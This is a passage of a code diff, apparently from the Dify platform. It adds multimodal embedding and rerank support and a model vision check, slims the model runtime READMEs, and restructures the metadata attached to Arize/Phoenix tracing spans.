urls.append(f"{base}{path}/.well-known/openid-configuration") + + # OAuth 2.0 Authorization Server Metadata with path insertion + urls.append(f"{base}/.well-known/oauth-authorization-server{path}") return urls diff --git a/api/core/mcp/mcp_client.py b/api/core/mcp/mcp_client.py index b0e0dab9be..2b0645b558 100644 --- a/api/core/mcp/mcp_client.py +++ b/api/core/mcp/mcp_client.py @@ -59,7 +59,7 @@ class MCPClient: try: logger.debug("Not supported method %s found in URL path, trying default 'mcp' method.", method_name) self.connect_server(sse_client, "sse") - except MCPConnectionError: + except (MCPConnectionError, ValueError): logger.debug("MCP connection failed with 'sse', falling back to 'mcp' method.") self.connect_server(streamablehttp_client, "mcp") diff --git a/api/core/model_manager.py b/api/core/model_manager.py index a63e94d59c..5a28bbcc3a 100644 --- a/api/core/model_manager.py +++ b/api/core/model_manager.py @@ -10,9 +10,9 @@ from core.errors.error import ProviderTokenNotInitError from core.model_runtime.callbacks.base_callback import Callback from core.model_runtime.entities.llm_entities import LLMResult from core.model_runtime.entities.message_entities import PromptMessage, PromptMessageTool -from core.model_runtime.entities.model_entities import ModelType +from core.model_runtime.entities.model_entities import ModelFeature, ModelType from core.model_runtime.entities.rerank_entities import RerankResult -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.errors.invoke import InvokeAuthorizationError, InvokeConnectionError, InvokeRateLimitError from core.model_runtime.model_providers.__base.large_language_model import LargeLanguageModel from core.model_runtime.model_providers.__base.moderation_model import ModerationModel @@ -200,7 +200,7 @@ class ModelInstance: def invoke_text_embedding( self, texts: list[str], user: str | None = None, input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke large language model @@ -212,7 +212,7 @@ class ModelInstance: if not isinstance(self.model_type_instance, TextEmbeddingModel): raise Exception("Model type instance is not TextEmbeddingModel") return cast( - TextEmbeddingResult, + EmbeddingResult, self._round_robin_invoke( function=self.model_type_instance.invoke, model=self.model, @@ -223,6 +223,34 @@ class ModelInstance: ), ) + def invoke_multimodal_embedding( + self, + multimodel_documents: list[dict], + user: str | None = None, + input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT, + ) -> EmbeddingResult: + """ + Invoke large language model + + :param multimodel_documents: multimodel documents to embed + :param user: unique user id + :param input_type: input type + :return: embeddings result + """ + if not isinstance(self.model_type_instance, TextEmbeddingModel): + raise Exception("Model type instance is not TextEmbeddingModel") + return cast( + EmbeddingResult, + self._round_robin_invoke( + function=self.model_type_instance.invoke, + model=self.model, + credentials=self.credentials, + multimodel_documents=multimodel_documents, + user=user, + input_type=input_type, + ), + ) + def get_text_embedding_num_tokens(self, texts: list[str]) -> list[int]: """ Get number of tokens for text embedding @@ -276,6 +304,40 @@ class ModelInstance: ), ) + def invoke_multimodal_rerank( + self, + query: dict, + docs: list[dict], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> RerankResult: + """ + Invoke rerank model + + :param query: search query + :param docs: docs for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id + :return: rerank result + """ + if not isinstance(self.model_type_instance, RerankModel): + raise Exception("Model type instance is not RerankModel") + return cast( + RerankResult, + self._round_robin_invoke( + function=self.model_type_instance.invoke_multimodal_rerank, + model=self.model, + credentials=self.credentials, + query=query, + docs=docs, + score_threshold=score_threshold, + top_n=top_n, + user=user, + ), + ) + def invoke_moderation(self, text: str, user: str | None = None) -> bool: """ Invoke moderation model @@ -461,6 +523,32 @@ class ModelManager: model=default_model_entity.model, ) + def check_model_support_vision(self, tenant_id: str, provider: str, model: str, model_type: ModelType) -> bool: + """ + Check if model supports vision + :param tenant_id: tenant id + :param provider: provider name + :param model: model name + :return: True if model supports vision, False otherwise + """ + model_instance = self.get_model_instance(tenant_id, provider, model_type, model) + model_type_instance = model_instance.model_type_instance + match model_type: + case ModelType.LLM: + model_type_instance = cast(LargeLanguageModel, model_type_instance) + case ModelType.TEXT_EMBEDDING: + model_type_instance = cast(TextEmbeddingModel, model_type_instance) + case ModelType.RERANK: + model_type_instance = cast(RerankModel, model_type_instance) + case _: + raise ValueError(f"Model type {model_type} is not supported") + model_schema = model_type_instance.get_model_schema(model, model_instance.credentials) + if not model_schema: + return False + if model_schema.features and ModelFeature.VISION in model_schema.features: + return True + return False + class LBModelManager: def __init__( diff --git a/api/core/model_runtime/README.md b/api/core/model_runtime/README.md index a6caa7eb1e..b9d2c55210 100644 --- a/api/core/model_runtime/README.md +++ b/api/core/model_runtime/README.md @@ -18,34 +18,20 @@ This module provides the interface for invoking and authenticating various model - Model provider display - ![image-20231210143654461](./docs/en_US/images/index/image-20231210143654461.png) - - Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. For detailed rule design, see: [Schema](./docs/en_US/schema.md). + Displays a list of all supported providers, including provider names, icons, supported model types list, predefined model list, configuration method, and credentials form rules, etc. - Selectable model list display - ![image-20231210144229650](./docs/en_US/images/index/image-20231210144229650.png) - After configuring provider/model credentials, the dropdown (application orchestration interface/default model) allows viewing of the available LLM list. Greyed out items represent predefined model lists from providers without configured credentials, facilitating user review of supported models. - In addition, this list also returns configurable parameter information and rules for LLM, as shown below: - - ![image-20231210144814617](./docs/en_US/images/index/image-20231210144814617.png) - - These parameters are all defined in the backend, allowing different settings for various parameters supported by different models, as detailed in: [Schema](./docs/en_US/schema.md#ParameterRule). + In addition, this list also returns configurable parameter information and rules for LLM. These parameters are all defined in the backend, allowing different settings for various parameters supported by different models. - Provider/model credential authentication - ![image-20231210151548521](./docs/en_US/images/index/image-20231210151548521.png) - - ![image-20231210151628992](./docs/en_US/images/index/image-20231210151628992.png) - - The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. The first image above is a provider credential DEMO, and the second is a model credential DEMO. + The provider list returns configuration information for the credentials form, which can be authenticated through Runtime's interface. ## Structure -![](./docs/en_US/images/index/image-20231210165243632.png) - Model Runtime is divided into three layers: - The outermost layer is the factory method @@ -60,9 +46,6 @@ Model Runtime is divided into three layers: It offers direct invocation of various model types, predefined model configuration information, getting predefined/remote model lists, model credential authentication methods. Different models provide additional special methods, like LLM's pre-computed tokens method, cost information obtaining method, etc., **allowing horizontal expansion** for different models under the same provider (within supported model types). -## Next Steps +## Documentation -- Add new provider configuration: [Link](./docs/en_US/provider_scale_out.md) -- Add new models for existing providers: [Link](./docs/en_US/provider_scale_out.md#AddModel) -- View YAML configuration rules: [Link](./docs/en_US/schema.md) -- Implement interface methods: [Link](./docs/en_US/interfaces.md) +For detailed documentation on how to add new providers or models, please refer to the [Dify documentation](https://docs.dify.ai/). diff --git a/api/core/model_runtime/README_CN.md b/api/core/model_runtime/README_CN.md index dfe614347a..0a8b56b3fe 100644 --- a/api/core/model_runtime/README_CN.md +++ b/api/core/model_runtime/README_CN.md @@ -18,34 +18,20 @@ - 模型供应商展示 - ![image-20231210143654461](./docs/zh_Hans/images/index/image-20231210143654461.png) - -​ 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等,规则设计详见:[Schema](./docs/zh_Hans/schema.md)。 + 展示所有已支持的供应商列表,除了返回供应商名称、图标之外,还提供了支持的模型类型列表,预定义模型列表、配置方式以及配置凭据的表单规则等等。 - 可选择的模型列表展示 - ![image-20231210144229650](./docs/zh_Hans/images/index/image-20231210144229650.png) + 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 -​ 配置供应商/模型凭据后,可在此下拉(应用编排界面/默认模型)查看可用的 LLM 列表,其中灰色的为未配置凭据供应商的预定义模型列表,方便用户查看已支持的模型。 - -​ 除此之外,该列表还返回了 LLM 可配置的参数信息和规则,如下图: - -​ ![image-20231210144814617](./docs/zh_Hans/images/index/image-20231210144814617.png) - -​ 这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数,详见:[Schema](./docs/zh_Hans/schema.md#ParameterRule)。 + 除此之外,该列表还返回了 LLM 可配置的参数信息和规则。这里的参数均为后端定义,相比之前只有 5 种固定参数,这里可为不同模型设置所支持的各种参数。 - 供应商/模型凭据鉴权 - ![image-20231210151548521](./docs/zh_Hans/images/index/image-20231210151548521.png) - -![image-20231210151628992](./docs/zh_Hans/images/index/image-20231210151628992.png) - -​ 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权,上图 1 为供应商凭据 DEMO,上图 2 为模型凭据 DEMO。 + 供应商列表返回了凭据表单的配置信息,可通过 Runtime 提供的接口对凭据进行鉴权。 ## 结构 -![](./docs/zh_Hans/images/index/image-20231210165243632.png) - Model Runtime 分三层: - 最外层为工厂方法 @@ -59,8 +45,7 @@ Model Runtime 分三层: 对于供应商/模型凭据,有两种情况 - 如 OpenAI 这类中心化供应商,需要定义如**api_key**这类的鉴权凭据 - - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据,就像下面这样,当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 - ![Alt text](docs/zh_Hans/images/index/image.png) + - 如[**Xinference**](https://github.com/xorbitsai/inference)这类本地部署的供应商,需要定义如**server_url**这类的地址凭据,有时候还需要定义**model_uid**之类的模型类型凭据。当在供应商层定义了这些凭据后,就可以在前端页面上直接展示,无需修改前端逻辑。 当配置好凭据后,就可以通过 DifyRuntime 的外部接口直接获取到对应供应商所需要的**Schema**(凭据表单规则),从而在可以在不修改前端逻辑的情况下,提供新的供应商/模型的支持。 @@ -74,20 +59,6 @@ Model Runtime 分三层: - 模型凭据 (**在供应商层定义**):这是一类不经常变动,一般在配置好后就不会再变动的参数,如 **api_key**、**server_url** 等。在 DifyRuntime 中,他们的参数名一般为**credentials: dict[str, any]**,Provider 层的 credentials 会直接被传递到这一层,不需要再单独定义。 -## 下一步 +## 文档 -### [增加新的供应商配置 👈🏻](./docs/zh_Hans/provider_scale_out.md) - -当添加后,这里将会出现一个新的供应商 - -![Alt text](docs/zh_Hans/images/index/image-1.png) - -### [为已存在的供应商新增模型 👈🏻](./docs/zh_Hans/provider_scale_out.md#%E5%A2%9E%E5%8A%A0%E6%A8%A1%E5%9E%8B) - -当添加后,对应供应商的模型列表中将会出现一个新的预定义模型供用户选择,如 GPT-3.5 GPT-4 ChatGLM3-6b 等,而对于支持自定义模型的供应商,则不需要新增模型。 - -![Alt text](docs/zh_Hans/images/index/image-2.png) - -### [接口的具体实现 👈🏻](./docs/zh_Hans/interfaces.md) - -你可以在这里找到你想要查看的接口的具体实现,以及接口的参数和返回值的具体含义。 +有关如何添加新供应商或模型的详细文档,请参阅 [Dify 文档](https://docs.dify.ai/)。 diff --git a/api/core/model_runtime/entities/text_embedding_entities.py b/api/core/model_runtime/entities/text_embedding_entities.py index 846b89d658..854c448250 100644 --- a/api/core/model_runtime/entities/text_embedding_entities.py +++ b/api/core/model_runtime/entities/text_embedding_entities.py @@ -19,7 +19,7 @@ class EmbeddingUsage(ModelUsage): latency: float -class TextEmbeddingResult(BaseModel): +class EmbeddingResult(BaseModel): """ Model class for text embedding result. """ @@ -27,3 +27,13 @@ class TextEmbeddingResult(BaseModel): model: str embeddings: list[list[float]] usage: EmbeddingUsage + + +class FileEmbeddingResult(BaseModel): + """ + Model class for file embedding result. + """ + + model: str + embeddings: list[list[float]] + usage: EmbeddingUsage diff --git a/api/core/model_runtime/model_providers/__base/rerank_model.py b/api/core/model_runtime/model_providers/__base/rerank_model.py index 36067118b0..0a576b832a 100644 --- a/api/core/model_runtime/model_providers/__base/rerank_model.py +++ b/api/core/model_runtime/model_providers/__base/rerank_model.py @@ -50,3 +50,43 @@ class RerankModel(AIModel): ) except Exception as e: raise self._transform_invoke_error(e) + + def invoke_multimodal_rerank( + self, + model: str, + credentials: dict, + query: dict, + docs: list[dict], + score_threshold: float | None = None, + top_n: int | None = None, + user: str | None = None, + ) -> RerankResult: + """ + Invoke multimodal rerank model + :param model: model name + :param credentials: model credentials + :param query: search query + :param docs: docs for reranking + :param score_threshold: score threshold + :param top_n: top n + :param user: unique user id + :return: rerank result + """ + try: + from core.plugin.impl.model import PluginModelClient + + plugin_model_manager = PluginModelClient() + return plugin_model_manager.invoke_multimodal_rerank( + tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + query=query, + docs=docs, + score_threshold=score_threshold, + top_n=top_n, + ) + except Exception as e: + raise self._transform_invoke_error(e) diff --git a/api/core/model_runtime/model_providers/__base/text_embedding_model.py b/api/core/model_runtime/model_providers/__base/text_embedding_model.py index bd68ffe903..4c902e2c11 100644 --- a/api/core/model_runtime/model_providers/__base/text_embedding_model.py +++ b/api/core/model_runtime/model_providers/__base/text_embedding_model.py @@ -2,7 +2,7 @@ from pydantic import ConfigDict from core.entities.embedding_type import EmbeddingInputType from core.model_runtime.entities.model_entities import ModelPropertyKey, ModelType -from core.model_runtime.entities.text_embedding_entities import TextEmbeddingResult +from core.model_runtime.entities.text_embedding_entities import EmbeddingResult from core.model_runtime.model_providers.__base.ai_model import AIModel @@ -20,16 +20,18 @@ class TextEmbeddingModel(AIModel): self, model: str, credentials: dict, - texts: list[str], + texts: list[str] | None = None, + multimodel_documents: list[dict] | None = None, user: str | None = None, input_type: EmbeddingInputType = EmbeddingInputType.DOCUMENT, - ) -> TextEmbeddingResult: + ) -> EmbeddingResult: """ Invoke text embedding model :param model: model name :param credentials: model credentials :param texts: texts to embed + :param files: files to embed :param user: unique user id :param input_type: input type :return: embeddings result @@ -38,16 +40,29 @@ class TextEmbeddingModel(AIModel): try: plugin_model_manager = PluginModelClient() - return plugin_model_manager.invoke_text_embedding( - tenant_id=self.tenant_id, - user_id=user or "unknown", - plugin_id=self.plugin_id, - provider=self.provider_name, - model=model, - credentials=credentials, - texts=texts, - input_type=input_type, - ) + if texts: + return plugin_model_manager.invoke_text_embedding( + tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + texts=texts, + input_type=input_type, + ) + if multimodel_documents: + return plugin_model_manager.invoke_multimodal_embedding( + tenant_id=self.tenant_id, + user_id=user or "unknown", + plugin_id=self.plugin_id, + provider=self.provider_name, + model=model, + credentials=credentials, + documents=multimodel_documents, + input_type=input_type, + ) + raise ValueError("No texts or files provided") except Exception as e: raise self._transform_invoke_error(e) diff --git a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py index 347992fa0d..a7b73e032e 100644 --- a/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py +++ b/api/core/ops/arize_phoenix_trace/arize_phoenix_trace.py @@ -6,7 +6,13 @@ from datetime import datetime, timedelta from typing import Any, Union, cast from urllib.parse import urlparse -from openinference.semconv.trace import OpenInferenceMimeTypeValues, OpenInferenceSpanKindValues, SpanAttributes +from openinference.semconv.trace import ( + MessageAttributes, + OpenInferenceMimeTypeValues, + OpenInferenceSpanKindValues, + SpanAttributes, + ToolCallAttributes, +) from opentelemetry.exporter.otlp.proto.grpc.trace_exporter import OTLPSpanExporter as GrpcOTLPSpanExporter from opentelemetry.exporter.otlp.proto.http.trace_exporter import OTLPSpanExporter as HttpOTLPSpanExporter from opentelemetry.sdk import trace as trace_sdk @@ -95,14 +101,14 @@ def setup_tracer(arize_phoenix_config: ArizeConfig | PhoenixConfig) -> tuple[tra def datetime_to_nanos(dt: datetime | None) -> int: - """Convert datetime to nanoseconds since epoch. If None, use current time.""" + """Convert datetime to nanoseconds since epoch for Arize/Phoenix.""" if dt is None: dt = datetime.now() return int(dt.timestamp() * 1_000_000_000) def error_to_string(error: Exception | str | None) -> str: - """Convert an error to a string with traceback information.""" + """Convert an error to a string with traceback information for Arize/Phoenix.""" error_message = "Empty Stack Trace" if error: if isinstance(error, Exception): @@ -114,7 +120,7 @@ def error_to_string(error: Exception | str | None) -> str: def set_span_status(current_span: Span, error: Exception | str | None = None): - """Set the status of the current span based on the presence of an error.""" + """Set the status of the current span based on the presence of an error for Arize/Phoenix.""" if error: error_string = error_to_string(error) current_span.set_status(Status(StatusCode.ERROR, error_string)) @@ -138,10 +144,17 @@ def set_span_status(current_span: Span, error: Exception | str | None = None): def safe_json_dumps(obj: Any) -> str: - """A convenience wrapper around `json.dumps` that ensures that any object can be safely encoded.""" + """A convenience wrapper to ensure that any object can be safely encoded for Arize/Phoenix.""" return json.dumps(obj, default=str, ensure_ascii=False) +def wrap_span_metadata(metadata, **kwargs): + """Add common metatada to all trace entity types for Arize/Phoenix.""" + metadata["created_from"] = "Dify" + metadata.update(kwargs) + return metadata + + class ArizePhoenixDataTrace(BaseTraceInstance): def __init__( self, @@ -183,16 +196,27 @@ class ArizePhoenixDataTrace(BaseTraceInstance): raise def workflow_trace(self, trace_info: WorkflowTraceInfo): - workflow_metadata = { - "workflow_run_id": trace_info.workflow_run_id or "", - "message_id": trace_info.message_id or "", - "workflow_app_log_id": trace_info.workflow_app_log_id or "", - "status": trace_info.workflow_run_status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - } - workflow_metadata.update(trace_info.metadata) + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] + + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.workflow_run_status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="workflow", + conversation_id=trace_info.conversation_id or "", + workflow_app_log_id=trace_info.workflow_app_log_id or "", + workflow_id=trace_info.workflow_id or "", + tenant_id=trace_info.tenant_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + workflow_run_elapsed_time=trace_info.workflow_run_elapsed_time or 0, + workflow_run_version=trace_info.workflow_run_version or "", + total_tokens=trace_info.total_tokens or 0, + file_list=safe_json_dumps(file_list), + query=trace_info.query or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id or trace_info.workflow_run_id self.ensure_root_span(dify_trace_id) @@ -201,10 +225,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): workflow_span = self.tracer.start_span( name=TraceTaskName.WORKFLOW_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.workflow_run_inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.workflow_run_outputs, ensure_ascii=False), SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(workflow_metadata, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.workflow_run_inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.workflow_run_outputs), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, start_time=datetime_to_nanos(trace_info.start_time), @@ -257,6 +283,7 @@ class ArizePhoenixDataTrace(BaseTraceInstance): "app_id": app_id, "app_name": node_execution.title, "status": node_execution.status, + "status_message": node_execution.error or "", "level": "ERROR" if node_execution.status == "failed" else "DEFAULT", } ) @@ -290,11 +317,11 @@ class ArizePhoenixDataTrace(BaseTraceInstance): node_span = self.tracer.start_span( name=node_execution.node_type, attributes={ + SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.INPUT_VALUE: safe_json_dumps(inputs_value), SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: safe_json_dumps(outputs_value), SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, - SpanAttributes.OPENINFERENCE_SPAN_KIND: span_kind.value, SpanAttributes.METADATA: safe_json_dumps(node_metadata), SpanAttributes.SESSION_ID: trace_info.conversation_id or "", }, @@ -339,30 +366,37 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def message_trace(self, trace_info: MessageTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping message trace.") return - file_list = cast(list[str], trace_info.file_list) or [] + file_list = trace_info.file_list if isinstance(trace_info.file_list, list) else [] message_file_data: MessageFile | None = trace_info.message_file_data if message_file_data is not None: file_url = f"{self.file_base_url}/{message_file_data.url}" if message_file_data else "" file_list.append(file_url) - message_metadata = { - "message_id": trace_info.message_id or "", - "conversation_mode": str(trace_info.conversation_mode or ""), - "user_id": trace_info.message_data.from_account_id or "", - "file_list": json.dumps(file_list), - "status": trace_info.message_data.status or "", - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens or 0, - "prompt_tokens": trace_info.message_tokens or 0, - "completion_tokens": trace_info.answer_tokens or 0, - "ls_provider": trace_info.message_data.model_provider or "", - "ls_model_name": trace_info.message_data.model_id or "", - } - message_metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.error or "", + level="ERROR" if trace_info.error else "DEFAULT", + trace_entity_type="message", + conversation_model=trace_info.conversation_model or "", + message_tokens=trace_info.message_tokens or 0, + answer_tokens=trace_info.answer_tokens or 0, + total_tokens=trace_info.total_tokens or 0, + conversation_mode=trace_info.conversation_mode or "", + gen_ai_server_time_to_first_token=trace_info.gen_ai_server_time_to_first_token or 0, + llm_streaming_time_to_generate=trace_info.llm_streaming_time_to_generate or 0, + is_streaming_request=trace_info.is_streaming_request or False, + user_id=trace_info.message_data.from_account_id or "", + file_list=safe_json_dumps(file_list), + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) # Add end user data if available if trace_info.message_data.from_end_user_id: @@ -370,14 +404,16 @@ class ArizePhoenixDataTrace(BaseTraceInstance): db.session.query(EndUser).where(EndUser.id == trace_info.message_data.from_end_user_id).first() ) if end_user_data is not None: - message_metadata["end_user_id"] = end_user_data.session_id + metadata["end_user_id"] = end_user_data.session_id attributes = { - SpanAttributes.INPUT_VALUE: trace_info.message_data.query, - SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.INPUT_VALUE: trace_info.message_data.query, + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.OUTPUT_VALUE: trace_info.message_data.answer, + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.TEXT.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } dify_trace_id = trace_info.trace_id or trace_info.message_id @@ -393,8 +429,10 @@ class ArizePhoenixDataTrace(BaseTraceInstance): try: # Convert outputs to string based on type + outputs_mime_type = OpenInferenceMimeTypeValues.TEXT.value if isinstance(trace_info.outputs, dict | list): - outputs_str = json.dumps(trace_info.outputs, ensure_ascii=False) + outputs_str = safe_json_dumps(trace_info.outputs) + outputs_mime_type = OpenInferenceMimeTypeValues.JSON.value elif isinstance(trace_info.outputs, str): outputs_str = trace_info.outputs else: @@ -402,10 +440,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): llm_attributes = { SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.LLM.value, - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, SpanAttributes.OUTPUT_VALUE: outputs_str, - SpanAttributes.METADATA: json.dumps(message_metadata, ensure_ascii=False), - SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id, + SpanAttributes.OUTPUT_MIME_TYPE: outputs_mime_type, + SpanAttributes.METADATA: safe_json_dumps(metadata), + SpanAttributes.SESSION_ID: trace_info.message_data.conversation_id or "", } llm_attributes.update(self._construct_llm_attributes(trace_info.inputs)) if trace_info.total_tokens is not None and trace_info.total_tokens > 0: @@ -449,16 +489,20 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def moderation_trace(self, trace_info: ModerationTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping moderation trace.") return - metadata = { - "message_id": trace_info.message_id, - "tool_name": "moderation", - "status": trace_info.message_data.status, - "status_message": trace_info.message_data.error or "", - "level": "ERROR" if trace_info.message_data.error else "DEFAULT", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.message_data.status or "", + status_message=trace_info.message_data.error or "", + level="ERROR" if trace_info.message_data.error else "DEFAULT", + trace_entity_type="moderation", + model_provider=trace_info.message_data.model_provider or "", + model_id=trace_info.message_data.model_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -467,18 +511,19 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.MODERATION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps( + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps( { - "action": trace_info.action, "flagged": trace_info.flagged, + "action": trace_info.action, "preset_response": trace_info.preset_response, - "inputs": trace_info.inputs, - }, - ensure_ascii=False, + "query": trace_info.query, + } ), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(trace_info.start_time), context=root_span_context, @@ -494,22 +539,28 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def suggested_question_trace(self, trace_info: SuggestedQuestionTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping suggested question trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "suggested_question", - "status": trace_info.status, - "status_message": trace_info.error or "", - "level": "ERROR" if trace_info.error else "DEFAULT", - "total_tokens": trace_info.total_tokens, - "ls_provider": trace_info.model_provider or "", - "ls_model_name": trace_info.model_id or "", - } - metadata.update(trace_info.metadata) + metadata = wrap_span_metadata( + trace_info.metadata, + trace_id=trace_info.trace_id or "", + message_id=trace_info.message_id or "", + status=trace_info.status or "", + status_message=trace_info.status_message or "", + level=trace_info.level or "", + trace_entity_type="suggested_question", + total_tokens=trace_info.total_tokens or 0, + from_account_id=trace_info.from_account_id or "", + agent_based=trace_info.agent_based or False, + from_source=trace_info.from_source or "", + model_provider=trace_info.model_provider or "", + model_id=trace_info.model_id or "", + workflow_run_id=trace_info.workflow_run_id or "", + ) dify_trace_id = trace_info.trace_id or trace_info.message_id self.ensure_root_span(dify_trace_id) @@ -518,10 +569,12 @@ class ArizePhoenixDataTrace(BaseTraceInstance): span = self.tracer.start_span( name=TraceTaskName.SUGGESTED_QUESTION_TRACE.value, attributes={ - SpanAttributes.INPUT_VALUE: json.dumps(trace_info.inputs, ensure_ascii=False), - SpanAttributes.OUTPUT_VALUE: json.dumps(trace_info.suggested_question, ensure_ascii=False), - SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.CHAIN.value, - SpanAttributes.METADATA: json.dumps(metadata, ensure_ascii=False), + SpanAttributes.OPENINFERENCE_SPAN_KIND: OpenInferenceSpanKindValues.TOOL.value, + SpanAttributes.INPUT_VALUE: safe_json_dumps(trace_info.inputs), + SpanAttributes.INPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.OUTPUT_VALUE: safe_json_dumps(trace_info.suggested_question), + SpanAttributes.OUTPUT_MIME_TYPE: OpenInferenceMimeTypeValues.JSON.value, + SpanAttributes.METADATA: safe_json_dumps(metadata), }, start_time=datetime_to_nanos(start_time), context=root_span_context, @@ -537,21 +590,23 @@ class ArizePhoenixDataTrace(BaseTraceInstance): def dataset_retrieval_trace(self, trace_info: DatasetRetrievalTraceInfo): if trace_info.message_data is None: + logger.warning("[Arize/Phoenix] Message data is None, skipping dataset retrieval trace.") return start_time = trace_info.start_time or trace_info.message_data.created_at end_time = trace_info.end_time or trace_info.message_data.updated_at - metadata = { - "message_id": trace_info.message_id, - "tool_name": "dataset_retrieval", - "status": trace_info.message_data.status, - "status_message": 